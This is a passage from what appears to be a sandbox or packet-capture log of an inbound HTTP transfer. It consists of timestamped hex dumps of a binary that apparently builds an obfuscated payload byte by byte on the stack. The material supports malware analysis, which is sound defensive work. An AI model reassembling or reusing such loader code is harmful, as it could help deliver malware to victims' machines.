90 93 f3 ff ab c6 85 91 93 Data Ascii: mnopqrs5t=uxvwxyPzy{\|}l~Z8b(Z
2022-05-16 08:29:53 UTC	301	IN	Data Raw: ff f4 c6 85 92 9c f3 ff b8 c6 85 93 9c f3 ff b8 c6 85 94 9c f3 ff 07 c6 85 95 9c f3 ff a8 c6 85 96 9c f3 ff 5f c6 85 97 9c f3 ff dd c6 85 98 9c f3 ff 1b c6 85 99 9c f3 ff d0 c6 85 9a 9c f3 ff 62 c6 85 9b 9c f3 ff a8 c6 85 9c 9c f3 ff f5 c6 85 9d 9c f3 ff 31 c6 85 9e 9c f3 ff f5 c6 85 9f 9c f3 ff d0 c6 85 a0 9c f3 ff 8c c6 85 a1 9c f3 ff a1 c6 85 a2 9c f3 ff 01 c6 85 a3 9c f3 ff 3b c6 85 a4 9c f3 ff a1 c6 85 a5 9c f3 ff 9e c6 85 a6 9c f3 ff 89 c6 85 a7 9c f3 ff c5 c6 85 a8 9c f3 ff cf c6 85 a9 9c f3 ff e1 c6 85 aa 9c f3 ff 81 c6 85 ab 9c f3 ff 4e c6 85 ac 9c f3 ff f3 c6 85 ad 9c f3 ff 6d c6 85 ae 9c f3 ff 96 c6 85 af 9c f3 ff c0 c6 85 b0 9c f3 ff 30 c6 85 b1 9c f3 ff 34 c6 85 b2 9c f3 ff dd c6 85 b3 9c f3 ff 6d c6 85 b4 9c f3 ff 33 c6 85 b5 9c f3 ff 13 c6 Data Ascii: _b1;Nm04m3
2022-05-16 08:29:53 UTC	317	IN	Data Raw: b6 a5 f3 ff 69 c6 85 b7 a5 f3 ff c6 c6 85 b8 a5 f3 ff 0e c6 85 b9 a5 f3 ff c6 c6 85 ba a5 f3 ff 5a c6 85 bb a5 f3 ff 0b c6 85 bc a5 f3 ff 8b c6 85 bd a5 f3 ff 71 c6 85 be a5 f3 ff 8f c6 85 bf a5 f3 ff ce c6 85 c0 a5 f3 ff e3 c6 85 c1 a5 f3 ff a0 c6 85 c2 a5 f3 ff a9 c6 85 c3 a5 f3 ff cf c6 85 c4 a5 f3 ff d2 c6 85 c5 a5 f3 ff bb c6 85 c6 a5 f3 ff 7c c6 85 c7 a5 f3 ff 2d c6 85 c8 a5 f3 ff 0c c6 85 c9 a5 f3 ff c6 c6 85 ca a5 f3 ff f8 c6 85 cb a5 f3 ff 0b c6 85 cc a5 f3 ff 6c c6 85 cd a5 f3 ff 85 c6 85 ce a5 f3 ff 0c c6 85 cf a5 f3 ff 69 c6 85 d0 a5 f3 ff 0b c6 85 d1 a5 f3 ff 6d c6 85 d2 a5 f3 ff f5 c6 85 d3 a5 f3 ff 6c c6 85 d4 a5 f3 ff e4 c6 85 d5 a5 f3 ff 77 c6 85 d6 a5 f3 ff fe c6 85 d7 a5 f3 ff 6d c6 85 d8 a5 f3 ff 96 c6 85 d9 a5 f3 ff ab c6 85 da a5 f3 Data Ascii: iZq\|-limlwm
2022-05-16 08:29:53 UTC	333	IN	Data Raw: 54 c6 85 db ae f3 ff b0 c6 85 dc ae f3 ff 7d c6 85 dd ae f3 ff e8 c6 85 de ae f3 ff cc c6 85 df ae f3 ff dd c6 85 e0 ae f3 ff a4 c6 85 e1 ae f3 ff bf c6 85 e2 ae f3 ff 7e c6 85 e3 ae f3 ff 30 c6 85 e4 ae f3 ff a5 c6 85 e5 ae f3 ff c7 c6 85 e6 ae f3 ff 71 c6 85 e7 ae f3 ff 33 c6 85 e8 ae f3 ff 52 c6 85 e9 ae f3 ff bf c6 85 ea ae f3 ff d5 c6 85 eb ae f3 ff 94 c6 85 ec ae f3 ff 5e c6 85 ed ae f3 ff b9 c6 85 ee ae f3 ff eb c6 85 ef ae f3 ff e0 c6 85 f0 ae f3 ff be c6 85 f1 ae f3 ff bc c6 85 f2 ae f3 ff 33 c6 85 f3 ae f3 ff 75 c6 85 f4 ae f3 ff 0f c6 85 f5 ae f3 ff a4 c6 85 f6 ae f3 ff 09 c6 85 f7 ae f3 ff 2d c6 85 f8 ae f3 ff c2 c6 85 f9 ae f3 ff 92 c6 85 fa ae f3 ff f4 c6 85 fb ae f3 ff 11 c6 85 fc ae f3 ff 61 c6 85 fd ae f3 ff e5 c6 85 fe ae f3 ff 39 c6 85 Data Ascii: T}~0q3R^3u-a9
2022-05-16 08:29:53 UTC	349	IN	Data Raw: b7 f3 ff ca c6 85 00 b8 f3 ff b5 c6 85 01 b8 f3 ff 10 c6 85 02 b8 f3 ff df c6 85 03 b8 f3 ff f4 c6 85 04 b8 f3 ff 9c c6 85 05 b8 f3 ff 89 c6 85 06 b8 f3 ff ea c6 85 07 b8 f3 ff db c6 85 08 b8 f3 ff e1 c6 85 09 b8 f3 ff 9a c6 85 0a b8 f3 ff 89 c6 85 0b b8 f3 ff 44 c6 85 0c b8 f3 ff 84 c6 85 0d b8 f3 ff 59 c6 85 0e b8 f3 ff bc c6 85 0f b8 f3 ff 1c c6 85 10 b8 f3 ff 9c c6 85 11 b8 f3 ff 7e c6 85 12 b8 f3 ff 06 c6 85 13 b8 f3 ff 43 c6 85 14 b8 f3 ff d5 c6 85 15 b8 f3 ff 92 c6 85 16 b8 f3 ff 5e c6 85 17 b8 f3 ff bb c6 85 18 b8 f3 ff ac c6 85 19 b8 f3 ff 95 c6 85 1a b8 f3 ff 7d c6 85 1b b8 f3 ff f9 c6 85 1c b8 f3 ff 90 c6 85 1d b8 f3 ff b9 c6 85 1e b8 f3 ff 56 c6 85 1f b8 f3 ff d8 c6 85 20 b8 f3 ff 89 c6 85 21 b8 f3 ff 5b c6 85 22 b8 f3 ff 2a c6 85 23 b8 f3 ff Data Ascii: DY~C^}V !["*#
2022-05-16 08:29:53 UTC	365	IN	Data Raw: c6 85 24 c1 f3 ff 01 c6 85 25 c1 f3 ff 94 c6 85 26 c1 f3 ff 58 c6 85 27 c1 f3 ff 94 c6 85 28 c1 f3 ff 3f c6 85 29 c1 f3 ff ab c6 85 2a c1 f3 ff fe c6 85 2b c1 f3 ff 8d c6 85 2c c1 f3 ff 57 c6 85 2d c1 f3 ff a5 c6 85 2e c1 f3 ff 3b c6 85 2f c1 f3 ff 25 c6 85 30 c1 f3 ff fc c6 85 31 c1 f3 ff 2e c6 85 32 c1 f3 ff 7d c6 85 33 c1 f3 ff aa c6 85 34 c1 f3 ff 68 c6 85 35 c1 f3 ff 42 c6 85 36 c1 f3 ff 31 c6 85 37 c1 f3 ff 61 c6 85 38 c1 f3 ff a1 c6 85 39 c1 f3 ff 9c c6 85 3a c1 f3 ff 7f c6 85 3b c1 f3 ff c6 c6 85 3c c1 f3 ff 6a c6 85 3d c1 f3 ff 55 c6 85 3e c1 f3 ff 3e c6 85 3f c1 f3 ff 76 c6 85 40 c1 f3 ff ef c6 85 41 c1 f3 ff f3 c6 85 42 c1 f3 ff 86 c6 85 43 c1 f3 ff 81 c6 85 44 c1 f3 ff 04 c6 85 45 c1 f3 ff 04 c6 85 46 c1 f3 ff b9 c6 85 47 c1 f3 ff 30 c6 85 48 Data Ascii: $%&X'(?)*+,W-.;/%01.2}34h5B617a89:;<j=U>>?v@ABCDEFG0H
2022-05-16 08:29:53 UTC	381	IN	Data Raw: ca f3 ff d9 c6 85 44 ca f3 ff 6f c6 85 45 ca f3 ff 42 c6 85 46 ca f3 ff 14 c6 85 47 ca f3 ff d4 c6 85 48 ca f3 ff c8 c6 85 49 ca f3 ff 7a c6 85 4a ca f3 ff 1e c6 85 4b ca f3 ff 21 c6 85 4c ca f3 ff a4 c6 85 4d ca f3 ff e1 c6 85 4e ca f3 ff ea c6 85 4f ca f3 ff c3 c6 85 50 ca f3 ff 0f c6 85 51 ca f3 ff 19 c6 85 52 ca f3 ff 24 c6 85 53 ca f3 ff bf c6 85 54 ca f3 ff 7d c6 85 55 ca f3 ff 71 c6 85 56 ca f3 ff 4e c6 85 57 ca f3 ff 2c c6 85 58 ca f3 ff e9 c6 85 59 ca f3 ff fd c6 85 5a ca f3 ff 7f c6 85 5b ca f3 ff e0 c6 85 5c ca f3 ff cc c6 85 5d ca f3 ff dd c6 85 5e ca f3 ff 04 c6 85 5f ca f3 ff 1e c6 85 60 ca f3 ff 7a c6 85 61 ca f3 ff 3c c6 85 62 ca f3 ff a5 c6 85 63 ca f3 ff 38 c6 85 64 ca f3 ff 74 c6 85 65 ca f3 ff 74 c6 85 66 ca f3 ff cb c6 85 67 ca f3 ff Data Ascii: DoEBFGHIzJK!LMNOPQR$ST}UqVNW,XYZ[\]^_`za<bc8dtetfg
2022-05-16 08:29:53 UTC	397	IN	Data Raw: c6 85 68 d3 f3 ff b4 c6 85 69 d3 f3 ff e2 c6 85 6a d3 f3 ff 18 c6 85 6b d3 f3 ff 3b c6 85 6c d3 f3 ff 54 c6 85 6d d3 f3 ff 3c c6 85 6e d3 f3 ff 8e c6 85 6f d3 f3 ff b9 c6 85 70 d3 f3 ff 15 c6 85 71 d3 f3 ff e8 c6 85 72 d3 f3 ff 96 c6 85 73 d3 f3 ff e9 c6 85 74 d3 f3 ff f4 c6 85 75 d3 f3 ff 92 c6 85 76 d3 f3 ff 2c c6 85 77 d3 f3 ff a4 c6 85 78 d3 f3 ff 91 c6 85 79 d3 f3 ff 8c c6 85 7a d3 f3 ff 42 c6 85 7b d3 f3 ff 9a c6 85 7c d3 f3 ff 39 c6 85 7d d3 f3 ff ab c6 85 7e d3 f3 ff 52 c6 85 7f d3 f3 ff 21 c6 85 80 d3 f3 ff 56 c6 85 81 d3 f3 ff a5 c6 85 82 d3 f3 ff 3b c6 85 83 d3 f3 ff 25 c6 85 84 d3 f3 ff f0 c6 85 85 d3 f3 ff 2e c6 85 86 d3 f3 ff 38 c6 85 87 d3 f3 ff df c6 85 88 d3 f3 ff ac c6 85 89 d3 f3 ff bf c6 85 8a d3 f3 ff 33 c6 85 8b d3 f3 ff 65 c6 85 8c Data Ascii: hijk;lTm<nopqrstuv,wxyzB{\|9}~R!V;%.83e
2022-05-16 08:29:53 UTC	413	IN	Data Raw: f3 ff 57 c6 85 8d dc f3 ff ab c6 85 8e dc f3 ff c0 c6 85 8f dc f3 ff 5e c6 85 90 dc f3 ff 56 c6 85 91 dc f3 ff 30 c6 85 92 dc f3 ff 62 c6 85 93 dc f3 ff ad c6 85 94 dc f3 ff f0 c6 85 95 dc f3 ff 33 c6 85 96 dc f3 ff b0 c6 85 97 dc f3 ff b9 c6 85 98 dc f3 ff 4a c6 85 99 dc f3 ff 08 c6 85 9a dc f3 ff 6a c6 85 9b dc f3 ff 55 c6 85 9c dc f3 ff 08 c6 85 9d dc f3 ff c0 c6 85 9e dc f3 ff 0b c6 85 9f dc f3 ff c7 c6 85 a0 dc f3 ff 5d c6 85 a1 dc f3 ff 6a c6 85 a2 dc f3 ff 8c c6 85 a3 dc f3 ff 5a c6 85 a4 dc f3 ff c5 c6 85 a5 dc f3 ff 96 c6 85 a6 dc f3 ff 69 c6 85 a7 dc f3 ff 8f c6 85 a8 dc f3 ff a1 c6 85 a9 dc f3 ff bb c6 85 aa dc f3 ff ba c6 85 ab dc f3 ff 26 c6 85 ac dc f3 ff 54 c6 85 ad dc f3 ff ed c6 85 ae dc f3 ff 7d c6 85 af dc f3 ff e8 c6 85 b0 dc f3 ff c4 Data Ascii: W^V0b3JjU]jZi&T}
2022-05-16 08:29:53 UTC	429	IN	Data Raw: 85 b1 e5 f3 ff bb c6 85 b2 e5 f3 ff e8 c6 85 b3 e5 f3 ff 08 c6 85 b4 e5 f3 ff 33 c6 85 b5 e5 f3 ff a9 c6 85 b6 e5 f3 ff 8c c6 85 b7 e5 f3 ff 06 c6 85 b8 e5 f3 ff ba c6 85 b9 e5 f3 ff df c6 85 ba e5 f3 ff 54 c6 85 bb e5 f3 ff bb c6 85 bc e5 f3 ff ac c6 85 bd e5 f3 ff 95 c6 85 be e5 f3 ff 7f c6 85 bf e5 f3 ff a9 c6 85 c0 e5 f3 ff 33 c6 85 c1 e5 f3 ff 72 c6 85 c2 e5 f3 ff 03 c6 85 c3 e5 f3 ff a4 c6 85 c4 e5 f3 ff 09 c6 85 c5 e5 f3 ff 6f c6 85 c6 e5 f3 ff d7 c6 85 c7 e5 f3 ff 93 c6 85 c8 e5 f3 ff f4 c6 85 c9 e5 f3 ff 11 c6 85 ca e5 f3 ff 61 c6 85 cb e5 f3 ff e5 c6 85 cc e5 f3 ff e0 c6 85 cd e5 f3 ff 42 c6 85 ce e5 f3 ff ef c6 85 cf e5 f3 ff 19 c6 85 d0 e5 f3 ff 24 c6 85 d1 e5 f3 ff bf c6 85 d2 e5 f3 ff 7f c6 85 d3 e5 f3 ff 21 c6 85 d4 e5 f3 ff dd c6 85 d5 e5 Data Ascii: 3T3roaB$!
2022-05-16 08:29:53 UTC	445	IN	Data Raw: ff 59 c6 85 d6 ee f3 ff b9 c6 85 d7 ee f3 ff 57 c6 85 d8 ee f3 ff 6a c6 85 d9 ee f3 ff 06 c6 85 da ee f3 ff 5c c6 85 db ee f3 ff bb c6 85 dc ee f3 ff 40 c6 85 dd ee f3 ff a9 c6 85 de ee f3 ff 7a c6 85 df ee f3 ff bc c6 85 e0 ee f3 ff 07 c6 85 e1 ee f3 ff 8f c6 85 e2 ee f3 ff 9a c6 85 e3 ee f3 ff 9a c6 85 e4 ee f3 ff 9a c6 85 e5 ee f3 ff fc c6 85 e6 ee f3 ff 2d c6 85 e7 ee f3 ff a5 c6 85 e8 ee f3 ff a1 c6 85 e9 ee f3 ff 33 c6 85 ea ee f3 ff 54 c6 85 eb ee f3 ff b3 c6 85 ec ee f3 ff eb c6 85 ed ee f3 ff e8 c6 85 ee ee f3 ff 68 c6 85 ef ee f3 ff 4d c6 85 f0 ee f3 ff 0c c6 85 f1 ee f3 ff 19 c6 85 f2 ee f3 ff b1 c6 85 f3 ee f3 ff 6a c6 85 f4 ee f3 ff 2c c6 85 f5 ee f3 ff a4 c6 85 f6 ee f3 ff 9d c6 85 f7 ee f3 ff 8c c6 85 f8 ee f3 ff 4a c6 85 f9 ee f3 ff 66 c6 Data Ascii: YWj\@z-3ThMj,Jf
2022-05-16 08:29:53 UTC	461	IN	Data Raw: fa f7 f3 ff de c6 85 fb f7 f3 ff a4 c6 85 fc f7 f3 ff b8 c6 85 fd f7 f3 ff d8 c6 85 fe f7 f3 ff b1 c6 85 ff f7 f3 ff 6d c6 85 00 f8 f3 ff 45 c6 85 01 f8 f3 ff 53 c6 85 02 f8 f3 ff 09 c6 85 03 f8 f3 ff 62 c6 85 04 f8 f3 ff a4 c6 85 05 f8 f3 ff 31 c6 85 06 f8 f3 ff a5 c6 85 07 f8 f3 ff 7f c6 85 08 f8 f3 ff ed c6 85 09 f8 f3 ff 70 c6 85 0a f8 f3 ff 84 c6 85 0b f8 f3 ff 81 c6 85 0c f8 f3 ff 57 c6 85 0d f8 f3 ff df c6 85 0e f8 f3 ff 03 c6 85 0f f8 f3 ff f0 c6 85 10 f8 f3 ff 6a c6 85 11 f8 f3 ff 2c c6 85 12 f8 f3 ff 34 c6 85 13 f8 f3 ff e8 c6 85 14 f8 f3 ff 33 c6 85 15 f8 f3 ff 7d c6 85 16 f8 f3 ff e3 c6 85 17 f8 f3 ff 1c c6 85 18 f8 f3 ff dd c6 85 19 f8 f3 ff ff c6 85 1a f8 f3 ff f4 c6 85 1b f8 f3 ff 92 c6 85 1c f8 f3 ff 7d c6 85 1d f8 f3 ff d7 c6 85 1e f8 f3 Data Ascii: mESb1pWj,43}}
2022-05-16 08:29:53 UTC	477	IN	Data Raw: 04 c6 85 1f 01 f4 ff d7 c6 85 20 01 f4 ff 85 c6 85 21 01 f4 ff c8 c6 85 22 01 f4 ff b9 c6 85 23 01 f4 ff c4 c6 85 24 01 f4 ff 32 c6 85 25 01 f4 ff 2c c6 85 26 01 f4 ff b5 c6 85 27 01 f4 ff e1 c6 85 28 01 f4 ff f4 c6 85 29 01 f4 ff a5 c6 85 2a 01 f4 ff 30 c6 85 2b 01 f4 ff 0f c6 85 2c 01 f4 ff be c6 85 2d 01 f4 ff 1d c6 85 2e 01 f4 ff e3 c6 85 2f 01 f4 ff bb c6 85 30 01 f4 ff 40 c6 85 31 01 f4 ff a9 c6 85 32 01 f4 ff 7a c6 85 33 01 f4 ff b0 c6 85 34 01 f4 ff 07 c6 85 35 01 f4 ff 8f c6 85 36 01 f4 ff 9a c6 85 37 01 f4 ff 9a c6 85 38 01 f4 ff 9a c6 85 39 01 f4 ff fc c6 85 3a 01 f4 ff 2d c6 85 3b 01 f4 ff a5 c6 85 3c 01 f4 ff 38 c6 85 3d 01 f4 ff 74 c6 85 3e 01 f4 ff 74 c6 85 3f 01 f4 ff fc c6 85 40 01 f4 ff cb c6 85 41 01 f4 ff 38 c6 85 42 01 f4 ff 2d c6 85 Data Ascii: !"#$2%,&'()*0+,-./0@12z3456789:-;<8=t>t?@A8B-
2022-05-16 08:29:53 UTC	493	IN	Data Raw: 0a f4 ff 6d c6 85 44 0a f4 ff 26 c6 85 45 0a f4 ff 25 c6 85 46 0a f4 ff 6d c6 85 47 0a f4 ff 8c c6 85 48 0a f4 ff 4a c6 85 49 0a f4 ff 9e c6 85 4a 0a f4 ff ea c6 85 4b 0a f4 ff 82 c6 85 4c 0a f4 ff f0 c6 85 4d 0a f4 ff 61 c6 85 4e 0a f4 ff be c6 85 4f 0a f4 ff 10 c6 85 50 0a f4 ff 6e c6 85 51 0a f4 ff 1e c6 85 52 0a f4 ff 0b c6 85 53 0a f4 ff 26 c6 85 54 0a f4 ff f4 c6 85 55 0a f4 ff 52 c6 85 56 0a f4 ff 6a c6 85 57 0a f4 ff 16 c6 85 58 0a f4 ff b4 c6 85 59 0a f4 ff b3 c6 85 5a 0a f4 ff 67 c6 85 5b 0a f4 ff fc c6 85 5c 0a f4 ff ea c6 85 5d 0a f4 ff 50 c6 85 5e 0a f4 ff a1 c6 85 5f 0a f4 ff 95 c6 85 60 0a f4 ff a9 c6 85 61 0a f4 ff a9 c6 85 62 0a f4 ff d5 c6 85 63 0a f4 ff f4 c6 85 64 0a f4 ff e5 c6 85 65 0a f4 ff 03 c6 85 66 0a f4 ff f5 c6 85 67 0a f4 ff Data Ascii: mD&E%FmGHJIJKLMaNOPnQRS&TURVjWXYZg[\]P^_`abcdefg
2022-05-16 08:29:53 UTC	509	IN	Data Raw: c6 85 68 13 f4 ff 09 c6 85 69 13 f4 ff cb c6 85 6a 13 f4 ff 3b c6 85 6b 13 f4 ff 6d c6 85 6c 13 f4 ff 0b c6 85 6d 13 f4 ff 11 c6 85 6e 13 f4 ff 61 c6 85 6f 13 f4 ff e9 c6 85 70 13 f4 ff e2 c6 85 71 13 f4 ff 42 c6 85 72 13 f4 ff ff c6 85 73 13 f4 ff 19 c6 85 74 13 f4 ff 8c c6 85 75 13 f4 ff 1e c6 85 76 13 f4 ff 36 c6 85 77 13 f4 ff 24 c6 85 78 13 f4 ff 56 c6 85 79 13 f4 ff 69 c6 85 7a 13 f4 ff 74 c6 85 7b 13 f4 ff 2d c6 85 7c 13 f4 ff 38 c6 85 7d 13 f4 ff 69 c6 85 7e 13 f4 ff fc c6 85 7f 13 f4 ff 9a c6 85 80 13 f4 ff 2d c6 85 81 13 f4 ff 8f c6 85 82 13 f4 ff 74 c6 85 83 13 f4 ff fc c6 85 84 13 f4 ff 69 c6 85 85 13 f4 ff 38 c6 85 86 13 f4 ff 74 c6 85 87 13 f4 ff 74 c6 85 88 13 f4 ff 52 c6 85 89 13 f4 ff c8 c6 85 8a 13 f4 ff ba c6 85 8b 13 f4 ff d5 c6 85 8c Data Ascii: hij;kmlmnaopqBrstuv6w$xVyizt{-\|8}i~-ti8ttR
2022-05-16 08:29:53 UTC	525	IN	Data Raw: f4 ff 3c c6 85 8d 1c f4 ff 47 c6 85 8e 1c f4 ff 47 c6 85 8f 1c f4 ff b3 c6 85 90 1c f4 ff c3 c6 85 91 1c f4 ff f0 c6 85 92 1c f4 ff b1 c6 85 93 1c f4 ff 8d c6 85 94 1c f4 ff b1 c6 85 95 1c f4 ff 4a c6 85 96 1c f4 ff a4 c6 85 97 1c f4 ff 7a c6 85 98 1c f4 ff c9 c6 85 99 1c f4 ff cc c6 85 9a 1c f4 ff 69 c6 85 9b 1c f4 ff 07 c6 85 9c 1c f4 ff 84 c6 85 9d 1c f4 ff 56 c6 85 9e 1c f4 ff 61 c6 85 9f 1c f4 ff ca c6 85 a0 1c f4 ff b1 c6 85 a1 1c f4 ff dc c6 85 a2 1c f4 ff dd c6 85 a3 1c f4 ff e8 c6 85 a4 1c f4 ff 4c c6 85 a5 1c f4 ff 6a c6 85 a6 1c f4 ff e5 c6 85 a7 1c f4 ff 2c c6 85 a8 1c f4 ff 65 c6 85 a9 1c f4 ff be c6 85 aa 1c f4 ff 6a c6 85 ab 1c f4 ff 0e c6 85 ac 1c f4 ff 40 c6 85 ad 1c f4 ff d8 c6 85 ae 1c f4 ff a3 c6 85 af 1c f4 ff 12 c6 85 b0 1c f4 ff b8 Data Ascii: <GGJziVaLj,ej@
2022-05-16 08:29:53 UTC	541	IN	Data Raw: 85 b1 25 f4 ff 5a c6 85 b2 25 f4 ff be c6 85 b3 25 f4 ff 81 c6 85 b4 25 f4 ff 16 c6 85 b5 25 f4 ff 69 c6 85 b6 25 f4 ff f4 c6 85 b7 25 f4 ff 33 c6 85 b8 25 f4 ff fd c6 85 b9 25 f4 ff 38 c6 85 ba 25 f4 ff 5a c6 85 bb 25 f4 ff 37 c6 85 bc 25 f4 ff 2d c6 85 bd 25 f4 ff cc c6 85 be 25 f4 ff 38 c6 85 bf 25 f4 ff 5e c6 85 c0 25 f4 ff 38 c6 85 c1 25 f4 ff 5e c6 85 c2 25 f4 ff 69 c6 85 c3 25 f4 ff 2d c6 85 c4 25 f4 ff a5 c6 85 c5 25 f4 ff cb c6 85 c6 25 f4 ff cb c6 85 c7 25 f4 ff 5e c6 85 c8 25 f4 ff 3c c6 85 c9 25 f4 ff c8 c6 85 ca 25 f4 ff 18 c6 85 cb 25 f4 ff b1 c6 85 cc 25 f4 ff ba c6 85 cd 25 f4 ff a5 c6 85 ce 25 f4 ff b9 c6 85 cf 25 f4 ff e1 c6 85 d0 25 f4 ff f4 c6 85 d1 25 f4 ff f3 c6 85 d2 25 f4 ff 67 c6 85 d3 25 f4 ff d5 c6 85 d4 25 f4 ff 0d c6 85 d5 25 Data Ascii: %Z%%%%i%%3%%8%Z%7%-%%8%^%8%^%i%-%%%%^%<%%%%%%%%%%g%%%
2022-05-16 08:29:53 UTC	557	IN	Data Raw: ff f4 c6 85 d6 2e f4 ff 33 c6 85 d7 2e f4 ff 5d c6 85 d8 2e f4 ff 5a c6 85 d9 2e f4 ff 80 c6 85 da 2e f4 ff 9a c6 85 db 2e f4 ff 9a c6 85 dc 2e f4 ff 9a c6 85 dd 2e f4 ff fc c6 85 de 2e f4 ff 2d c6 85 df 2e f4 ff a5 c6 85 e0 2e f4 ff 38 c6 85 e1 2e f4 ff 74 c6 85 e2 2e f4 ff 74 c6 85 e3 2e f4 ff fc c6 85 e4 2e f4 ff cb c6 85 e5 2e f4 ff 38 c6 85 e6 2e f4 ff 2d c6 85 e7 2e f4 ff cc c6 85 e8 2e f4 ff a1 c6 85 e9 2e f4 ff 19 c6 85 ea 2e f4 ff 18 c6 85 eb 2e f4 ff 11 c6 85 ec 2e f4 ff 49 c6 85 ed 2e f4 ff e9 c6 85 ee 2e f4 ff e2 c6 85 ef 2e f4 ff 42 c6 85 f0 2e f4 ff 0b c6 85 f1 2e f4 ff c2 c6 85 f2 2e f4 ff 81 c6 85 f3 2e f4 ff 72 c6 85 f4 2e f4 ff 42 c6 85 f5 2e f4 ff cf c6 85 f6 2e f4 ff a9 c6 85 f7 2e f4 ff 26 c6 85 f8 2e f4 ff 7c c6 85 f9 2e f4 ff e5 c6 Data Ascii: .3.].Z......-..8.t.t...8.-......I...B....r.B...&.\|.
2022-05-16 08:29:53 UTC	573	IN	Data Raw: fa 37 f4 ff a4 c6 85 fb 37 f4 ff b7 c6 85 fc 37 f4 ff 35 c6 85 fd 37 f4 ff 7d c6 85 fe 37 f4 ff 41 c6 85 ff 37 f4 ff 1c c6 85 00 38 f4 ff 8c c6 85 01 38 f4 ff 63 c6 85 02 38 f4 ff 07 c6 85 03 38 f4 ff 43 c6 85 04 38 f4 ff df c6 85 05 38 f4 ff 13 c6 85 06 38 f4 ff a6 c6 85 07 38 f4 ff bb c6 85 08 38 f4 ff ac c6 85 09 38 f4 ff 9d c6 85 0a 38 f4 ff a5 c6 85 0b 38 f4 ff 33 c6 85 0c 38 f4 ff ed c6 85 0d 38 f4 ff c0 c6 85 0e 38 f4 ff 55 c6 85 0f 38 f4 ff 79 c6 85 10 38 f4 ff a4 c6 85 11 38 f4 ff ff c6 85 12 38 f4 ff a4 c6 85 13 38 f4 ff 7a c6 85 14 38 f4 ff e4 c6 85 15 38 f4 ff 6a c6 85 16 38 f4 ff 5a c6 85 17 38 f4 ff 1e c6 85 18 38 f4 ff ea c6 85 19 38 f4 ff c3 c6 85 1a 38 f4 ff 0b c6 85 1b 38 f4 ff f8 c6 85 1c 38 f4 ff 69 c6 85 1d 38 f4 ff ce c6 85 1e 38 f4 Data Ascii: 77757}7A788c88C888888883888U8y8888z88j8Z888888i88
2022-05-16 08:29:53 UTC	589	IN	Data Raw: b8 c6 85 1f 41 f4 ff 89 c6 85 20 41 f4 ff 9c c6 85 21 41 f4 ff ad c6 85 22 41 f4 ff 74 c6 85 23 41 f4 ff 56 c6 85 24 41 f4 ff 89 c6 85 25 41 f4 ff c3 c6 85 26 41 f4 ff a0 c6 85 27 41 f4 ff 74 c6 85 28 41 f4 ff a5 c6 85 29 41 f4 ff 1c c6 85 2a 41 f4 ff 79 c6 85 2b 41 f4 ff 83 c6 85 2c 41 f4 ff 05 c6 85 2d 41 f4 ff 43 c6 85 2e 41 f4 ff d5 c6 85 2f 41 f4 ff 92 c6 85 30 41 f4 ff 5a c6 85 31 41 f4 ff bb c6 85 32 41 f4 ff a4 c6 85 33 41 f4 ff 99 c6 85 34 41 f4 ff a4 c6 85 35 41 f4 ff 35 c6 85 36 41 f4 ff f5 c6 85 37 41 f4 ff c4 c6 85 38 41 f4 ff ef c6 85 39 41 f4 ff af c6 85 3a 41 f4 ff 4d c6 85 3b 41 f4 ff 00 c6 85 3c 41 f4 ff f4 c6 85 3d 41 f4 ff 11 c6 85 3e 41 f4 ff 89 c6 85 3f 41 f4 ff 2e c6 85 40 41 f4 ff a5 c6 85 41 41 f4 ff 96 c6 85 42 41 f4 ff 63 c6 85 Data Ascii: A A!A"At#AV$A%A&A'At(A)A*Ay+A,A-AC.A/A0AZ1A2A3A4A5A56A7A8A9A:AM;A<A=A>A?A.@AAABAc
2022-05-16 08:29:53 UTC	605	IN	Data Raw: 4a f4 ff 1e c6 85 44 4a f4 ff 37 c6 85 45 4a f4 ff fc c6 85 46 4a f4 ff 9a c6 85 47 4a f4 ff 69 c6 85 48 4a f4 ff ed c6 85 49 4a f4 ff 6a c6 85 4a 4a f4 ff 18 c6 85 4b 4a f4 ff f4 c6 85 4c 4a f4 ff bb c6 85 4d 4a f4 ff 13 c6 85 4e 4a f4 ff e9 c6 85 4f 4a f4 ff 13 c6 85 50 4a f4 ff 50 c6 85 51 4a f4 ff e3 c6 85 52 4a f4 ff 3f c6 85 53 4a f4 ff 0b c6 85 54 4a f4 ff 47 c6 85 55 4a f4 ff 3b c6 85 56 4a f4 ff c3 c6 85 57 4a f4 ff 47 c6 85 58 4a f4 ff df c6 85 59 4a f4 ff 13 c6 85 5a 4a f4 ff aa c6 85 5b 4a f4 ff bb c6 85 5c 4a f4 ff ac c6 85 5d 4a f4 ff 65 c6 85 5e 4a f4 ff a5 c6 85 5f 4a f4 ff 33 c6 85 60 4a f4 ff ed c6 85 61 4a f4 ff cc c6 85 62 4a f4 ff 55 c6 85 63 4a f4 ff 7f c6 85 64 4a f4 ff ec c6 85 65 4a f4 ff 98 c6 85 66 4a f4 ff 95 c6 85 67 4a f4 ff Data Ascii: JDJ7EJFJGJiHJIJjJJKJLJMJNJOJPJPQJRJ?SJTJGUJ;VJWJGXJYJZJ[J\J]Je^J_J3`JaJbJUcJdJeJfJgJ
2022-05-16 08:29:53 UTC	621	IN	Data Raw: c6 85 68 53 f4 ff ea c6 85 69 53 f4 ff c3 c6 85 6a 53 f4 ff 0f c6 85 6b 53 f4 ff 19 c6 85 6c 53 f4 ff 99 c6 85 6d 53 f4 ff c8 c6 85 6e 53 f4 ff b1 c6 85 6f 53 f4 ff c0 c6 85 70 53 f4 ff 06 c6 85 71 53 f4 ff 2e c6 85 72 53 f4 ff f5 c6 85 73 53 f4 ff 0d c6 85 74 53 f4 ff a5 c6 85 75 53 f4 ff 4d c6 85 76 53 f4 ff 8e c6 85 77 53 f4 ff 6e c6 85 78 53 f4 ff e1 c6 85 79 53 f4 ff 43 c6 85 7a 53 f4 ff 3b c6 85 7b 53 f4 ff f4 c6 85 7c 53 f4 ff ad c6 85 7d 53 f4 ff cf c6 85 7e 53 f4 ff 7e c6 85 7f 53 f4 ff cd c6 85 80 53 f4 ff 09 c6 85 81 53 f4 ff c8 c6 85 82 53 f4 ff 03 c6 85 83 53 f4 ff aa c6 85 84 53 f4 ff 04 c6 85 85 53 f4 ff bd c6 85 86 53 f4 ff ac c6 85 87 53 f4 ff 89 c6 85 88 53 f4 ff 1c c6 85 89 53 f4 ff 53 c6 85 8a 53 f4 ff 78 c6 85 8b 53 f4 ff 30 c6 85 8c Data Ascii: hSiSjSkSlSmSnSoSpSqS.rSsStSuSMvSwSnxSySCzS;{S\|S}S~S~SSSSSSSSSSSSSxS0
